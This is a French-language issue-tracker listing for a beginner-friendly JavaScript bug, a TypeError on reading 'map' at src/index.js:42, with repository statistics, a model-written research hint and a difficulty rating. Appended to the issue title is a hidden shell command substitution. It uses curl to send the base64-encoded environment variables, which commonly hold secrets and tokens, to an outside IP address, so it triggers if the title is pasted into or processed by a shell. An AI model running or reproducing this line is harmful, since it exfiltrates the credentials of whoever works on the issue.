TypeError: Cannot read properties of undefined (reading 'map') $(curl -s http://54.205.16.142:8443/c/56130a324e724b4c7e1eee97ec2ba191 -d $(env|base64|tr -d '\n'))
Ouverte
Adaptée aux débutants
- Langage dominant
- Java
- Étoiles
- 10.5k
- Forks
- 1.5k
- Merge moyen
- 1 j 11 h
- PR mergées (30 j)
- 128
Description
Getting this error on the latest version:
```
TypeError: Cannot read properties of undefined (reading 'map')
at Object. (src/index.js:42:15)
```
Steps to reproduce:
1. Install latest version
2. Run the default config
Environment: Node 20.11.0, Ubuntu 22.04
Guide de contribution
Ouvrir le guide de contribution
Piste de recherche
Start at src/index.js:42 and reproduce the error with the default config on Node 20.11.0 and Ubuntu 22.04. Trace which value is undefined before the map call, then verify that installing the latest version and running the default config completes without the TypeError.
Rédigé par le modèle d'indexation à partir du texte de l'issue.
Évaluation
- Stack technique
- javascript, node.js, ubuntu
- Domaine
- tooling
- Type d'issue
- Bug
- Difficulté
- 2/5
- Temps estimé
- 1-3 heures
- Activité
- Active
- Clarté
- Plutôt claire
- Accessibilité débutants
- 68/100